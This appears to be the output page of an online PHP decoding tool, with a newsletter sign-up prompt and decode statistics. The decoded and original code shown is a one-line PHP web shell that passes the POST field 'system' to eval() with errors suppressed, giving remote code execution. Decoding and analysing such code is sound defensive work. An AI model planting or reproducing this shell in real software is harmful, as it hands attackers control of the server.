Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php function fun($update){ @eval($update); } @fun($_POST['system']); ..
Decoded Output download
<?php
function fun($update){
@eval($update);
}
@fun($_POST['system']);
?>
Did this file decode correctly?
Original Code
<?php
function fun($update){
@eval($update);
}
@fun($_POST['system']);
?>
Function Calls
fun | 1 |
Stats
MD5 | a1d5d416fbec9806f70243ef6cfcd5bb |
Eval Count | 0 |
Decode Time | 44 ms |